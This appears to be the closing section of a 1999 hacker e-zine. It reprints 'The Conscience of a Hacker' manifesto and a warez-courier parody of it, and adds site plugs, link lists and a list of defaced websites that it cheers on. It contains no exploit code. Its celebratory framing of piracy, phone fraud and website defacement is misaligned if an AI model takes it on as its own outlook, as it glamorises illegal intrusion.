~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............. An oldie but goodie and translated from that gawdawful 'krad speak' for those of you that have been living under a rock for the last 10 years the original file follows this spoof. - Ed This was edited from krad-speak to ascii.. if you want to see it in it's original glory, see BoW 4 ______________________________________________________________________________ 555555555555555555555555555555555555555555555555555555555555555555555555555555 ______________________________________________________________________________ BoW BoW BoW BoW BoW Bo* *BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo| Th3 K0nsc|3nc3 0f a K0ur|3r |BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo* by: Th3 K0d3s1ay3r *BoW BoW BoW BoW BoW Bo ============================================================================== The following wuz written shortly after my arrest... Written on March 20, 1994 ------------------------------------------------------------------------------ Another one kaught today, itz all over the paperz. "Teenager arrested in software piracy skandal", "kourier arrested after distributing warez"... Damn Kidz. They're all alike. But did u, in u're 3-piece psychology and 1950's technobrain, ever take a look behind the eyez of a kourier? Did u ever wonder what made him tick, what forcez shaped him, what may have molded him? I am a kourier, enter my world... Mine iz a world that beginz with skool... I'm not the smartezt kid in the class, I don't quite get this education thing... Damn underachiever. They're all alike. I'm in cosmetology skool or kommunity college. I've listened to teacherz explain for the fifteenth time how to reduce a fraction, and I still don't understand it. "No Ms. Smith, I didn't show my work. I don't get how u type with these pencil things. Give me a joystick or something." Damn kid. Must be a druggie. They're all alike. I make a discovery today. I found a computer. Wait a second, this is cool. I can play commander keen all i want. If i loose a game, it's because i didn't get the 0-day eleet game c0dez. Not because it doesn't like me... Or feelz i'm a worthless inbred skumbag... Or thinkz i'm an idiot... Or doesn't like teaching and is threatened by my good looks... Damn kid. All he duz is play doom. They're all alike. And then it happened... a door opened to a new world... rushing thru the fone line like heroin thru an addict's veinz, the latest version of DOS is sent out at a bazillion baud, a refuge from intelligence is sought... a 0-day warez board is found! "This is it... this is where i belong!" I know everyone here... even if i've never met them, never talked to them, never traded apogee with them, may never hear from them again... i know u all... Damn kid. Tying up the fone line again. They're all alike... U bet u're ass we're all alike... we've been spoon-fed baby food at skool when we hungered for ANSI and codez... the bitz of meat u did let slip thru were a little on the well done side and i had a little trouble digesting them. We've been dominated by intellectualz, or ignored by dum skolar dudez. The few that had something to teach talked in some fancee shmancee english language or something, and i wouldn't know what they were talking about anyway. This is our world now... the world of the kode and the console copier, the beauty of the file point. We make use of some telefone thing or something for free with codez so we don't have to pay to trade -15 day gamez and the latest ANSI releases, and u kall us kriminals. We trace credit cards... and U call us kriminals. We distribute copyrighted software... and u call us criminals. We steal games from radio shack... and u call us criminals. We exist without skin color, (cuz we're always inside downloading and uploading) without religious bias, (cuz we have know idea that the hell religios bias is) without intelligence... and u kall us criminals. U start wars and stuff, yet we're the kriminals. Yes, I am a criminal. My crime is that of stupidity. My crime is that of judging people by how much they upload and how k-rad they're typing is, not what they look like or if they can spell they're name right the first time without messing up. My crime is that of stealing u're work and putting my name On it, and u get all huffy puffy about it. I am a kourier, and this is my manifesto. U may stop one moron, but U can't stop us all! After all, we're all alike. +++The Kodeslayer+++ =----------------------------------------------------------------------------------------= The Hacker Manifesto aka 'The Mentor's Last Words' ==Phrack Inc.== Volume One, Issue 7, Phile 3 of 10 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= The following was written shortly after my arrest... \/\The Conscience of a Hacker/\/ by +++The Mentor+++ Written on January 8, 1986 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"... Damn kids. They're all alike. But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him? I am a hacker, enter my world... Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me... Damn underachiever. They're all alike. I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..." Damn kid. Probably copied it. They're all alike. I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me... Or thinks I'm a smart ass... Or doesn't like teaching and shouldn't be here... Damn kid. All he does is play games. They're all alike. And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all... Damn kid. Tying up the phone line again. They're all alike... You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us will- ing pupils, but those few are like drops of water in the desert. This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals. Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for. I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike. +++The Mentor+++ _______________________________________________________________________________ -=- @HWA SITE.1 http://www.insecure.org/ SiteOp: Fyodor Real hacker's site by a real hacker, lots of good resources and reading materials fyodor is the author of the infamous nmap program and used to run Fyodor's Exploit World which inspired the likes of Rootshell.... give it a look see if you haven't already - eentity @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... From HNN rumours section http://www.hackernews.com/ see the archives section on HNN or attrition.org for copies of many of these sites in their defaced form. http://www.attrition.org/ Latest cracked pages courtesy of attrition.org (www.reverse.net) .......................... Reverse Net (www.isop.org) ........................... Internet Society of Pakistan (matahum.bacolod.worldtelphil.com) .......... World Telphil (www.aspx.com) ............................. ASPX (www.greatbasinphoto.com)................... Great Basin Photo (www.guesslimousines.com)................... Guess Limousines (www.hotelrivieramaya.com).................. Hotel Riviera Maya (www.icaroweb.com) ......................... Icaro Web (www.motoairbag.com)........................ Moto Airbag (www.webnautics.com) ....................... Webnautics (www.vanasia.it)............................ Vanasia (summa.infosquare.it)....................... Infosquare (IT) (www.infosatpoint.it)....................... Infosat Point (IT) (www.medicinasportiva.it)................... Medicina Sportiva (IT) (www.targetgroup.it)........................ Target Group (IT) (www.presidencia.gov.py).................... Presidencia (PY) and more sites at the attrition cracked web sites mirror: http://www.attrition.org/mirror/attrition/index.html ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html hack-faq Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html Original jargon file New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ New jargon file HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://bewoner.dma.be/cum/ Go there Brasil........: http://www.psynet.net/ka0z Go there http://www.elementais.cjb.net Go there Canada .......: http://www.hackcanada.com Go there Columbia......: http://www.cascabel.8m.com Go there http://www.intrusos.cjb.net Go there Indonesia.....: http://www.k-elektronik.org/index2.html Go there http://members.xoom.com/neblonica/ Go there http://hackerlink.or.id/ Go there Netherlands...: http://security.pine.nl/ Go there Russia........: http://www.tsu.ru/~eugene/ Go there Singapore.....: http://www.icepoint.com Go there Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. Go there Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]